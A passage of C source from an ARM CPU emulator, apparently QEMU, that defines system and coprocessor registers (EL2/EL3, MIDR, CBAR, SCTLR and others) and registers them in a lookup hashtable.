ARM_FEATURE_EL3)) { ARMCPRegInfo rvbar = { .name = "RVBAR_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 12, .crm = 0, .opc2 = 1, .type = ARM_CP_CONST, .access = PL2_R, .resetvalue = cpu->rvbar }; define_one_arm_cp_reg(cpu, &rvbar); } } else { /* If EL2 is missing but higher ELs are enabled, we need to * register the no_el2 reginfos. */ if (arm_feature(env, ARM_FEATURE_EL3)) { /* When EL3 exists but not EL2, VPIDR and VMPIDR take the value * of MIDR_EL1 and MPIDR_EL1. 
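 * The variants defined below implement exactly that: VPIDR_EL2 is an
 * ARM_CP_CONST view of cpu->midr, and VMPIDR_EL2 routes reads through
 * mpidr_read() while arm_cp_write_ignore() discards writes.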
*/ ARMCPRegInfo vpidr_regs[] = { { .name = "VPIDR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 0, .crm = 0, .opc2 = 0, .access = PL2_RW, .accessfn = access_el3_aa32ns_aa64any, .type = ARM_CP_CONST, .resetvalue = cpu->midr, .fieldoffset = offsetof(CPUARMState, cp15.vpidr_el2) }, { .name = "VMPIDR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 0, .crm = 0, .opc2 = 5, .access = PL2_RW, .accessfn = access_el3_aa32ns_aa64any, .type = ARM_CP_NO_RAW, .writefn = arm_cp_write_ignore, .readfn = mpidr_read }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, vpidr_regs); define_arm_cp_regs(cpu, el3_no_el2_cp_reginfo); if (arm_feature(env, ARM_FEATURE_V8)) { define_arm_cp_regs(cpu, el3_no_el2_v8_cp_reginfo); } } } if (arm_feature(env, ARM_FEATURE_EL3)) { define_arm_cp_regs(cpu, el3_cp_reginfo); ARMCPRegInfo el3_regs[] = { { .name = "RVBAR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 12, .crm = 0, .opc2 = 1, .type = ARM_CP_CONST, .access = PL3_R, .resetvalue = cpu->rvbar }, { .name = "SCTLR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 1, .crm = 0, .opc2 = 0, .access = PL3_RW, .raw_writefn = raw_write, .writefn = sctlr_write, .fieldoffset = offsetof(CPUARMState, cp15.sctlr_el[3]), .resetvalue = cpu->reset_sctlr }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, el3_regs); } /* The behaviour of NSACR is sufficiently various that we don't * try to describe it in a single reginfo: * if EL3 is 64 bit, then trap to EL3 from S EL1, * reads as constant 0xc00 from NS EL1 and NS EL2 * if EL3 is 32 bit, then RW at EL3, RO at NS EL1 and NS EL2 * if v7 without EL3, register doesn't exist * if v8 without EL3, reads as constant 0xc00 from NS EL1 and NS EL2 */ if (arm_feature(env, ARM_FEATURE_EL3)) { if (arm_feature(env, ARM_FEATURE_AARCH64)) { ARMCPRegInfo nsacr = { .name = "NSACR", .type = ARM_CP_CONST, .cp = 15, .opc1 = 0, .crn = 1, .crm = 1, .opc2 = 2, .access = PL1_RW, .accessfn = nsacr_access, .resetvalue = 0xc00 }; define_one_arm_cp_reg(cpu, &nsacr); } else { ARMCPRegInfo nsacr = { .name = "NSACR", .cp = 15, .opc1 = 0, .crn = 1, .crm = 1, .opc2 = 2, .access = PL3_RW | PL1_R, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.nsacr) }; define_one_arm_cp_reg(cpu, &nsacr); } } else { if (arm_feature(env, ARM_FEATURE_V8)) { ARMCPRegInfo nsacr = { .name = "NSACR", .type = ARM_CP_CONST, .cp = 15, .opc1 = 0, .crn = 1, .crm = 1, .opc2 = 2, .access = PL1_R, .resetvalue = 0xc00 }; define_one_arm_cp_reg(cpu, &nsacr); } } if (arm_feature(env, ARM_FEATURE_PMSA)) { if (arm_feature(env, ARM_FEATURE_V6)) { /* PMSAv6 not implemented */ assert(arm_feature(env, ARM_FEATURE_V7)); define_arm_cp_regs(cpu, vmsa_pmsa_cp_reginfo); define_arm_cp_regs(cpu, pmsav7_cp_reginfo); } else { define_arm_cp_regs(cpu, pmsav5_cp_reginfo); } } else { define_arm_cp_regs(cpu, vmsa_pmsa_cp_reginfo); define_arm_cp_regs(cpu, vmsa_cp_reginfo); /* TTBCR2 is introduced with ARMv8.2-AA32HPD. 
*/ if (cpu_isar_feature(aa32_hpd, cpu)) { define_one_arm_cp_reg(cpu, &ttbcr2_reginfo); } } if (arm_feature(env, ARM_FEATURE_THUMB2EE)) { define_arm_cp_regs(cpu, t2ee_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_GENERIC_TIMER)) { define_arm_cp_regs(cpu, generic_timer_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_VAPA)) { define_arm_cp_regs(cpu, vapa_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_CACHE_TEST_CLEAN)) { define_arm_cp_regs(cpu, cache_test_clean_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_CACHE_DIRTY_REG)) { define_arm_cp_regs(cpu, cache_dirty_status_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_CACHE_BLOCK_OPS)) { define_arm_cp_regs(cpu, cache_block_ops_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_OMAPCP)) { define_arm_cp_regs(cpu, omap_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_STRONGARM)) { define_arm_cp_regs(cpu, strongarm_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_XSCALE)) { define_arm_cp_regs(cpu, xscale_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_DUMMY_C15_REGS)) { define_arm_cp_regs(cpu, dummy_c15_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_LPAE)) { define_arm_cp_regs(cpu, lpae_cp_reginfo); } if (cpu_isar_feature(aa32_jazelle, cpu)) { define_arm_cp_regs(cpu, jazelle_regs); } /* Slightly awkwardly, the OMAP and StrongARM cores need all of * cp15 crn=0 to be writes-ignored, whereas for other cores they should * be read-only (ie write causes UNDEF exception). */ { ARMCPRegInfo id_pre_v8_midr_cp_reginfo[] = { /* Pre-v8 MIDR space. * Note that the MIDR isn't a simple constant register because * of the TI925 behaviour where writes to another register can * cause the MIDR value to change. * * Unimplemented registers in the c15 0 0 0 space default to * MIDR. Define MIDR first as this entire space, then CTR, TCMTR * and friends override accordingly. */ { .name = "MIDR", .cp = 15, .crn = 0, .crm = 0, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_R, .resetvalue = cpu->midr, .writefn = arm_cp_write_ignore, .raw_writefn = raw_write, .readfn = midr_read, .fieldoffset = offsetof(CPUARMState, cp15.c0_cpuid), .type = ARM_CP_OVERRIDE }, /* crn = 0 op1 = 0 crm = 3..7 : currently unassigned; we RAZ. 
*/ { .name = "DUMMY", .cp = 15, .crn = 0, .crm = 3, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_R, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "DUMMY", .cp = 15, .crn = 0, .crm = 4, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_R, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "DUMMY", .cp = 15, .crn = 0, .crm = 5, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_R, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "DUMMY", .cp = 15, .crn = 0, .crm = 6, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_R, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "DUMMY", .cp = 15, .crn = 0, .crm = 7, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_R, .type = ARM_CP_CONST, .resetvalue = 0 }, REGINFO_SENTINEL }; ARMCPRegInfo id_v8_midr_cp_reginfo[] = { { .name = "MIDR_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 0, .opc2 = 0, .access = PL1_R, .type = ARM_CP_NO_RAW, .resetvalue = cpu->midr, .fieldoffset = offsetof(CPUARMState, cp15.c0_cpuid), .readfn = midr_read }, /* crn = 0 op1 = 0 crm = 0 op2 = 4,7 : AArch32 aliases of MIDR */ { .name = "MIDR", .type = ARM_CP_ALIAS | ARM_CP_CONST, .cp = 15, .crn = 0, .crm = 0, .opc1 = 0, .opc2 = 4, .access = PL1_R, .resetvalue = cpu->midr }, { .name = "MIDR", .type = ARM_CP_ALIAS | ARM_CP_CONST, .cp = 15, .crn = 0, .crm = 0, .opc1 = 0, .opc2 = 7, .access = PL1_R, .resetvalue = cpu->midr }, { .name = "REVIDR_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 0, .crm = 0, .opc2 = 6, .access = PL1_R, .accessfn = access_aa64_tid1, .type = ARM_CP_CONST, .resetvalue = cpu->revidr }, REGINFO_SENTINEL }; ARMCPRegInfo id_cp_reginfo[] = { /* These are common to v8 and pre-v8 */ { .name = "CTR", .cp = 15, .crn = 0, .crm = 0, .opc1 = 0, .opc2 = 1, .access = PL1_R, .accessfn = ctr_el0_access, .type = ARM_CP_CONST, .resetvalue = cpu->ctr }, { .name = "CTR_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .opc2 = 1, .crn = 0, .crm = 0, .access = PL0_R, .accessfn = ctr_el0_access, .type = ARM_CP_CONST, .resetvalue = cpu->ctr }, /* TCMTR and TLBTR exist in v8 but have no 64-bit versions */ { .name = "TCMTR", .cp = 15, .crn = 0, .crm = 0, .opc1 = 0, .opc2 = 2, .access = PL1_R, .accessfn = access_aa32_tid1, .type = ARM_CP_CONST, .resetvalue = 0 }, REGINFO_SENTINEL }; /* TLBTR is specific to VMSA */ ARMCPRegInfo id_tlbtr_reginfo = { .name = "TLBTR", .cp = 15, .crn = 0, .crm = 0, .opc1 = 0, .opc2 = 3, .access = PL1_R, .accessfn = access_aa32_tid1, .type = ARM_CP_CONST, .resetvalue = 0, }; /* MPUIR is specific to PMSA V6+ */ ARMCPRegInfo id_mpuir_reginfo = { .name = "MPUIR", .cp = 15, .crn = 0, .crm = 0, .opc1 = 0, .opc2 = 4, .access = PL1_R, .type = ARM_CP_CONST, .resetvalue = cpu->pmsav7_dregion << 8 }; ARMCPRegInfo crn0_wi_reginfo = { .name = "CRN0_WI", .cp = 15, .crn = 0, .crm = CP_ANY, .opc1 = CP_ANY, .opc2 = CP_ANY, .access = PL1_W, .type = ARM_CP_NOP | ARM_CP_OVERRIDE }; if (arm_feature(env, ARM_FEATURE_OMAPCP) || arm_feature(env, ARM_FEATURE_STRONGARM)) { ARMCPRegInfo *r; /* Register the blanket "writes ignored" value first to cover the * whole space. Then update the specific ID registers to allow write * access, so that they ignore writes rather than causing them to * UNDEF. 
*/ define_one_arm_cp_reg(cpu, &crn0_wi_reginfo); for (r = id_pre_v8_midr_cp_reginfo; r->type != ARM_CP_SENTINEL; r++) { r->access = PL1_RW; } for (r = id_cp_reginfo; r->type != ARM_CP_SENTINEL; r++) { r->access = PL1_RW; } id_mpuir_reginfo.access = PL1_RW; id_tlbtr_reginfo.access = PL1_RW; } if (arm_feature(env, ARM_FEATURE_V8)) { define_arm_cp_regs(cpu, id_v8_midr_cp_reginfo); } else { define_arm_cp_regs(cpu, id_pre_v8_midr_cp_reginfo); } define_arm_cp_regs(cpu, id_cp_reginfo); if (!arm_feature(env, ARM_FEATURE_PMSA)) { define_one_arm_cp_reg(cpu, &id_tlbtr_reginfo); } else if (arm_feature(env, ARM_FEATURE_V7)) { define_one_arm_cp_reg(cpu, &id_mpuir_reginfo); } } if (arm_feature(env, ARM_FEATURE_MPIDR)) { ARMCPRegInfo mpidr_cp_reginfo[] = { { .name = "MPIDR_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .crn = 0, .crm = 0, .opc1 = 0, .opc2 = 5, .access = PL1_R, .readfn = mpidr_read, .type = ARM_CP_NO_RAW }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, mpidr_cp_reginfo); } if (arm_feature(env, ARM_FEATURE_AUXCR)) { ARMCPRegInfo auxcr_reginfo[] = { { .name = "ACTLR_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 1, .crm = 0, .opc2 = 1, .access = PL1_RW, .accessfn = access_tacr, .type = ARM_CP_CONST, .resetvalue = cpu->reset_auxcr }, { .name = "ACTLR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 0, .opc2 = 1, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "ACTLR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 1, .crm = 0, .opc2 = 1, .access = PL3_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, auxcr_reginfo); if (cpu_isar_feature(aa32_ac2, cpu)) { define_arm_cp_regs(cpu, actlr2_hactlr2_reginfo); } } if (arm_feature(env, ARM_FEATURE_CBAR)) { /* * CBAR is IMPDEF, but common on Arm Cortex-A implementations. * There are two flavours: * (1) older 32-bit only cores have a simple 32-bit CBAR * (2) 64-bit cores have a 64-bit CBAR visible to AArch64, plus a * 32-bit register visible to AArch32 at a different encoding * to the "flavour 1" register and with the bits rearranged to * be able to squash a 64-bit address into the 32-bit view. * We distinguish the two via the ARM_FEATURE_AARCH64 flag, but * in future if we support AArch32-only configs of some of the * AArch64 cores we might need to add a specific feature flag * to indicate cores with "flavour 2" CBAR. */ if (arm_feature(env, ARM_FEATURE_AARCH64)) { /* 32 bit view is [31:18] 0...0 [43:32]. 
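 * A worked example with an illustrative (made-up) address: with
 * reset_cbar = 0x0000004020080000,
 *   cbar32 = (extract64(cbar, 18, 14) << 18) | extract64(cbar, 32, 12)
 *          = 0x20080000 | 0x040 = 0x20080040,
 * so addr[31:18] keeps its position, addr[43:32] lands in bits [11:0],
 * and bits [17:12] read as zero.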
*/ uint32_t cbar32 = (extract64(cpu->reset_cbar, 18, 14) << 18) | extract64(cpu->reset_cbar, 32, 12); ARMCPRegInfo cbar_reginfo[] = { { .name = "CBAR", .type = ARM_CP_CONST, .cp = 15, .crn = 15, .crm = 3, .opc1 = 1, .opc2 = 0, .access = PL1_R, .resetvalue = cbar32 }, { .name = "CBAR_EL1", .state = ARM_CP_STATE_AA64, .type = ARM_CP_CONST, .opc0 = 3, .opc1 = 1, .crn = 15, .crm = 3, .opc2 = 0, .access = PL1_R, .resetvalue = cpu->reset_cbar }, REGINFO_SENTINEL }; /* We don't implement a r/w 64 bit CBAR currently */ assert(arm_feature(env, ARM_FEATURE_CBAR_RO)); define_arm_cp_regs(cpu, cbar_reginfo); } else { ARMCPRegInfo cbar = { .name = "CBAR", .cp = 15, .crn = 15, .crm = 0, .opc1 = 4, .opc2 = 0, .access = PL1_R|PL3_W, .resetvalue = cpu->reset_cbar, .fieldoffset = offsetof(CPUARMState, cp15.c15_config_base_address) }; if (arm_feature(env, ARM_FEATURE_CBAR_RO)) { cbar.access = PL1_R; cbar.fieldoffset = 0; cbar.type = ARM_CP_CONST; } define_one_arm_cp_reg(cpu, &cbar); } } if (arm_feature(env, ARM_FEATURE_VBAR)) { ARMCPRegInfo vbar_cp_reginfo[] = { { .name = "VBAR", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .crn = 12, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .writefn = vbar_write, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.vbar_s), offsetof(CPUARMState, cp15.vbar_ns) }, .resetvalue = 0 }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, vbar_cp_reginfo); } /* Generic registers whose values depend on the implementation */ { ARMCPRegInfo sctlr = { .name = "SCTLR", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 1, .crm = 0, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.sctlr_s), offsetof(CPUARMState, cp15.sctlr_ns) }, .writefn = sctlr_write, .resetvalue = cpu->reset_sctlr, .raw_writefn = raw_write, }; if (arm_feature(env, ARM_FEATURE_XSCALE)) { /* Normally we would always end the TB on an SCTLR write, but Linux * arch/arm/mach-pxa/sleep.S expects two instructions following * an MMU enable to execute from cache. Imitate this behaviour. 
*/ sctlr.type |= ARM_CP_SUPPRESS_TB_END; } define_one_arm_cp_reg(cpu, &sctlr); } if (cpu_isar_feature(aa64_lor, cpu)) { define_arm_cp_regs(cpu, lor_reginfo); } if (cpu_isar_feature(aa64_pan, cpu)) { define_one_arm_cp_reg(cpu, &pan_reginfo); } if (cpu_isar_feature(aa64_ats1e1, cpu)) { define_arm_cp_regs(cpu, ats1e1_reginfo); } if (cpu_isar_feature(aa32_ats1e1, cpu)) { define_arm_cp_regs(cpu, ats1cp_reginfo); } if (cpu_isar_feature(aa64_uao, cpu)) { define_one_arm_cp_reg(cpu, &uao_reginfo); } if (arm_feature(env, ARM_FEATURE_EL2) && cpu_isar_feature(aa64_vh, cpu)) { define_arm_cp_regs(cpu, vhe_reginfo); } if (cpu_isar_feature(aa64_sve, cpu)) { define_one_arm_cp_reg(cpu, &zcr_el1_reginfo); if (arm_feature(env, ARM_FEATURE_EL2)) { define_one_arm_cp_reg(cpu, &zcr_el2_reginfo); } else { define_one_arm_cp_reg(cpu, &zcr_no_el2_reginfo); } if (arm_feature(env, ARM_FEATURE_EL3)) { define_one_arm_cp_reg(cpu, &zcr_el3_reginfo); } } #ifdef TARGET_AARCH64 if (cpu_isar_feature(aa64_pauth, cpu)) { define_arm_cp_regs(cpu, pauth_reginfo); } if (cpu_isar_feature(aa64_rndr, cpu)) { define_arm_cp_regs(cpu, rndr_reginfo); } /* Data Cache clean instructions up to PoP */ if (cpu_isar_feature(aa64_dcpop, cpu)) { define_one_arm_cp_reg(cpu, dcpop_reg); if (cpu_isar_feature(aa64_dcpodp, cpu)) { define_one_arm_cp_reg(cpu, dcpodp_reg); } } #endif if (cpu_isar_feature(any_predinv, cpu)) { define_arm_cp_regs(cpu, predinv_reginfo); } if (cpu_isar_feature(any_ccidx, cpu)) { define_arm_cp_regs(cpu, ccsidr2_reginfo); } /* * Register redirections and aliases must be done last, * after the registers from the other extensions have been defined. */ if (arm_feature(env, ARM_FEATURE_EL2) && cpu_isar_feature(aa64_vh, cpu)) { define_arm_vh_e2h_redirects_aliases(cpu); } } static void add_cpreg_to_hashtable(ARMCPU *cpu, const ARMCPRegInfo *r, void *opaque, int state, int secstate, int crm, int opc1, int opc2, const char *name) { /* Private utility function for define_one_arm_cp_reg_with_opaque(): * add a single reginfo struct to the hash table. */ uint32_t *key = g_new(uint32_t, 1); ARMCPRegInfo *r2 = g_memdup(r, sizeof(ARMCPRegInfo)); int is64 = (r->type & ARM_CP_64BIT) ? 1 : 0; int ns = (secstate & ARM_CP_SECSTATE_NS) ? 1 : 0; r2->name = g_strdup(name); /* Reset the secure state to the specific incoming state. This is * necessary as the register may have been defined with both states. */ r2->secure = secstate; if (r->bank_fieldoffsets[0] && r->bank_fieldoffsets[1]) { /* Register is banked (using both entries in array). * Overwriting fieldoffset as the array is only used to define * banked registers but later only fieldoffset is used. */ r2->fieldoffset = r->bank_fieldoffsets[ns]; } if (state == ARM_CP_STATE_AA32) { if (r->bank_fieldoffsets[0] && r->bank_fieldoffsets[1]) { /* If the register is banked then we don't need to migrate or * reset the 32-bit instance in certain cases: * * 1) If the register has both 32-bit and 64-bit instances then we * can count on the 64-bit instance taking care of the * non-secure bank. * 2) If ARMv8 is enabled then we can count on a 64-bit version * taking care of the secure bank. This requires that separate * 32 and 64-bit definitions are provided. */ if ((r->state == ARM_CP_STATE_BOTH && ns) || (arm_feature(&cpu->env, ARM_FEATURE_V8) && !ns)) { r2->type |= ARM_CP_ALIAS; } } else if ((secstate != r->secure) && !ns) { /* The register is not banked so we only want to allow migration of * the non-secure instance. 
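         *
         * E.g. a non-banked register declared with .secure = 0 is entered
         * once per security state; the synthesised secure instance takes
         * this branch (secstate != r->secure with ns == 0) and is marked
         * ARM_CP_ALIAS, so only the non-secure copy is migrated and reset.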
*/ r2->type |= ARM_CP_ALIAS; } if (r->state == ARM_CP_STATE_BOTH) { /* We assume it is a cp15 register if the .cp field is left unset. */ if (r2->cp == 0) { r2->cp = 15; } #ifdef HOST_WORDS_BIGENDIAN if (r2->fieldoffset) { r2->fieldoffset += sizeof(uint32_t); } #endif } } if (state == ARM_CP_STATE_AA64) { /* To allow abbreviation of ARMCPRegInfo * definitions, we treat cp == 0 as equivalent to * the value for "standard guest-visible sysreg". * STATE_BOTH definitions are also always "standard * sysreg" in their AArch64 view (the .cp value may * be non-zero for the benefit of the AArch32 view). */ if (r->cp == 0 || r->state == ARM_CP_STATE_BOTH) { r2->cp = CP_REG_ARM64_SYSREG_CP; } *key = ENCODE_AA64_CP_REG(r2->cp, r2->crn, crm, r2->opc0, opc1, opc2); } else { *key = ENCODE_CP_REG(r2->cp, is64, ns, r2->crn, crm, opc1, opc2); } if (opaque) { r2->opaque = opaque; } /* reginfo passed to helpers is correct for the actual access, * and is never ARM_CP_STATE_BOTH: */ r2->state = state; /* Make sure reginfo passed to helpers for wildcarded regs * has the correct crm/opc1/opc2 for this reg, not CP_ANY: */ r2->crm = crm; r2->opc1 = opc1; r2->opc2 = opc2; /* By convention, for wildcarded registers only the first * entry is used for migration; the others are marked as * ALIAS so we don't try to transfer the register * multiple times. Special registers (ie NOP/WFI) are * never migratable and not even raw-accessible. */ if ((r->type & ARM_CP_SPECIAL)) { r2->type |= ARM_CP_NO_RAW; } if (((r->crm == CP_ANY) && crm != 0) || ((r->opc1 == CP_ANY) && opc1 != 0) || ((r->opc2 == CP_ANY) && opc2 != 0)) { r2->type |= ARM_CP_ALIAS | ARM_CP_NO_GDB; } /* Check that raw accesses are either forbidden or handled. Note that * we can't assert this earlier because the setup of fieldoffset for * banked registers has to be done first. */ if (!(r2->type & ARM_CP_NO_RAW)) { // assert(!raw_accessors_invalid(r2)); } /* Overriding of an existing definition must be explicitly * requested. */ if (!(r->type & ARM_CP_OVERRIDE)) { ARMCPRegInfo *oldreg; oldreg = g_hash_table_lookup(cpu->cp_regs, key); if (oldreg && !(oldreg->type & ARM_CP_OVERRIDE)) { fprintf(stderr, "Register redefined: cp=%d %d bit " "crn=%d crm=%d opc1=%d opc2=%d, " "was %s, now %s\n", r2->cp, 32 + 32 * is64, r2->crn, r2->crm, r2->opc1, r2->opc2, oldreg->name, r2->name); g_assert_not_reached(); } } g_hash_table_insert(cpu->cp_regs, key, r2); } void define_one_arm_cp_reg_with_opaque(ARMCPU *cpu, const ARMCPRegInfo *r, void *opaque) { /* Define implementations of coprocessor registers. * We store these in a hashtable because typically * there are less than 150 registers in a space which * is 16*16*16*8*8 = 262144 in size. * Wildcarding is supported for the crm, opc1 and opc2 fields. * If a register is defined twice then the second definition is * used, so this can be used to define some generic registers and * then override them with implementation specific variations. * At least one of the original and the second definition should * include ARM_CP_OVERRIDE in its type bits -- this is just a guard * against accidental use. * * The state field defines whether the register is to be * visible in the AArch32 or AArch64 execution state. If the * state is set to ARM_CP_STATE_BOTH then we synthesise a * reginfo structure for the AArch32 view, which sees the lower * 32 bits of the 64 bit register. * * Only registers visible in AArch64 may set r->opc0; opc0 cannot * be wildcarded. 
AArch64 registers are always considered to be 64 * bits; the ARM_CP_64BIT* flag applies only to the AArch32 view of * the register, if any. */ int crm, opc1, opc2, state; int crmmin = (r->crm == CP_ANY) ? 0 : r->crm; int crmmax = (r->crm == CP_ANY) ? 15 : r->crm; int opc1min = (r->opc1 == CP_ANY) ? 0 : r->opc1; int opc1max = (r->opc1 == CP_ANY) ? 7 : r->opc1; int opc2min = (r->opc2 == CP_ANY) ? 0 : r->opc2; int opc2max = (r->opc2 == CP_ANY) ? 7 : r->opc2; /* 64 bit registers have only CRm and Opc1 fields */ assert(!((r->type & ARM_CP_64BIT) && (r->opc2 || r->crn))); /* op0 only exists in the AArch64 encodings */ assert((r->state != ARM_CP_STATE_AA32) || (r->opc0 == 0)); /* AArch64 regs are all 64 bit so ARM_CP_64BIT is meaningless */ assert((r->state != ARM_CP_STATE_AA64) || !(r->type & ARM_CP_64BIT)); /* The AArch64 pseudocode CheckSystemAccess() specifies that op1 * encodes a minimum access level for the register. We roll this * runtime check into our general permission check code, so check * here that the reginfo's specified permissions are strict enough * to encompass the generic architectural permission check. */ #ifndef NDEBUG if (r->state != ARM_CP_STATE_AA32) { int mask = 0; switch (r->opc1) { case 0: /* min_EL EL1, but some accessible to EL0 via kernel ABI */ mask = PL0U_R | PL1_RW; break; case 1: case 2: /* min_EL EL1 */ mask = PL1_RW; break; case 3: /* min_EL EL0 */ mask = PL0_RW; break; case 4: case 5: /* min_EL EL2 */ mask = PL2_RW; break; case 6: /* min_EL EL3 */ mask = PL3_RW; break; case 7: /* min_EL EL1, secure mode only (we don't check the latter) */ mask = PL1_RW; break; default: /* broken reginfo with out-of-range opc1 */ assert(false); break; } /* assert our permissions are not too lax (stricter is fine) */ assert((r->access & ~mask) == 0); } #endif /* Check that the register definition has enough info to handle * reads and writes if they are permitted. */ if (!(r->type & (ARM_CP_SPECIAL|ARM_CP_CONST))) { if (r->access & PL3_R) { assert((r->fieldoffset || (r->bank_fieldoffsets[0] && r->bank_fieldoffsets[1])) || r->readfn); } if (r->access & PL3_W) { assert((r->fieldoffset || (r->bank_fieldoffsets[0] && r->bank_fieldoffsets[1])) || r->writefn); } } /* Bad type field probably means missing sentinel at end of reg list */ assert(cptype_valid(r->type)); for (crm = crmmin; crm <= crmmax; crm++) { for (opc1 = opc1min; opc1 <= opc1max; opc1++) { for (opc2 = opc2min; opc2 <= opc2max; opc2++) { for (state = ARM_CP_STATE_AA32; state <= ARM_CP_STATE_AA64; state++) { if (r->state != state && r->state != ARM_CP_STATE_BOTH) { continue; } if (state == ARM_CP_STATE_AA32) { /* Under AArch32 CP registers can be common * (same for secure and non-secure world) or banked. 
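                         *
                         * A register that leaves .secure at 0 is entered
                         * under two names below: "<NAME>_S" for the secure
                         * state and its plain name for the non-secure state
                         * (e.g. "SCTLR_S" and "SCTLR").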
                         */
                        char *name;

                        switch (r->secure) {
                        case ARM_CP_SECSTATE_S:
                        case ARM_CP_SECSTATE_NS:
                            add_cpreg_to_hashtable(cpu, r, opaque, state,
                                                   r->secure, crm, opc1, opc2,
                                                   r->name);
                            break;
                        default:
                            name = g_strdup_printf("%s_S", r->name);
                            add_cpreg_to_hashtable(cpu, r, opaque, state,
                                                   ARM_CP_SECSTATE_S,
                                                   crm, opc1, opc2, name);
                            g_free(name);
                            add_cpreg_to_hashtable(cpu, r, opaque, state,
                                                   ARM_CP_SECSTATE_NS,
                                                   crm, opc1, opc2, r->name);
                            break;
                        }
                    } else {
                        /* AArch64 registers get mapped to non-secure instance
                         * of AArch32 */
                        add_cpreg_to_hashtable(cpu, r, opaque, state,
                                               ARM_CP_SECSTATE_NS,
                                               crm, opc1, opc2, r->name);
                    }
                }
            }
        }
    }
}

void define_arm_cp_regs_with_opaque(ARMCPU *cpu, const ARMCPRegInfo *regs,
                                    void *opaque)
{
    /* Define a whole list of registers */
    const ARMCPRegInfo *r;
    for (r = regs; r->type != ARM_CP_SENTINEL; r++) {
        define_one_arm_cp_reg_with_opaque(cpu, r, opaque);
    }
}

/*
 * Modify ARMCPRegInfo for access from userspace.
 *
 * This is a data-driven modification directed by
 * ARMCPRegUserSpaceInfo. All registers become ARM_CP_CONST as
 * user-space cannot alter any values and dynamic values pertaining to
 * execution state are hidden from user space view anyway.
 */
void modify_arm_cp_regs(ARMCPRegInfo *regs, const ARMCPRegUserSpaceInfo *mods)
{
    const ARMCPRegUserSpaceInfo *m;
    ARMCPRegInfo *r;

    for (m = mods; m->name; m++) {
        GPatternSpec *pat = NULL;
        if (m->is_glob) {
            pat = g_pattern_spec_new(m->name);
        }
        for (r = regs; r->type != ARM_CP_SENTINEL; r++) {
            if (pat && g_pattern_match_string(pat, r->name)) {
                r->type = ARM_CP_CONST;
                r->access = PL0U_R;
                r->resetvalue = 0;
                /* continue */
            } else if (strcmp(r->name, m->name) == 0) {
                r->type = ARM_CP_CONST;
                r->access = PL0U_R;
                r->resetvalue &= m->exported_bits;
                r->resetvalue |= m->fixed_bits;
                break;
            }
        }
        if (pat) {
            g_pattern_spec_free(pat);
        }
    }
}

const ARMCPRegInfo *get_arm_cp_reginfo(GHashTable *cpregs, uint32_t encoded_cp)
{
    return g_hash_table_lookup(cpregs, &encoded_cp);
}

void arm_cp_write_ignore(CPUARMState *env, const ARMCPRegInfo *ri,
                         uint64_t value)
{
    /* Helper coprocessor write function for write-ignore registers */
}

uint64_t arm_cp_read_zero(CPUARMState *env, const ARMCPRegInfo *ri)
{
    /* Helper coprocessor read function for read-as-zero registers */
    return 0;
}

void arm_cp_reset_ignore(CPUARMState *env, const ARMCPRegInfo *opaque)
{
    /* Helper coprocessor reset function for do-nothing-on-reset registers */
}

static int bad_mode_switch(CPUARMState *env, int mode,
                           CPSRWriteType write_type)
{
    /* Return true if it is not valid for us to switch to
     * this CPU mode (ie all the UNPREDICTABLE cases in
     * the ARM ARM CPSRWriteByInstr pseudocode).
     */

    /* Changes to or from Hyp via MSR and CPS are illegal. */
    if (write_type == CPSRWriteByInstr &&
        ((env->uncached_cpsr & CPSR_M) == ARM_CPU_MODE_HYP ||
         mode == ARM_CPU_MODE_HYP)) {
        return 1;
    }

    switch (mode) {
    case ARM_CPU_MODE_USR:
        return 0;
    case ARM_CPU_MODE_SYS:
    case ARM_CPU_MODE_SVC:
    case ARM_CPU_MODE_ABT:
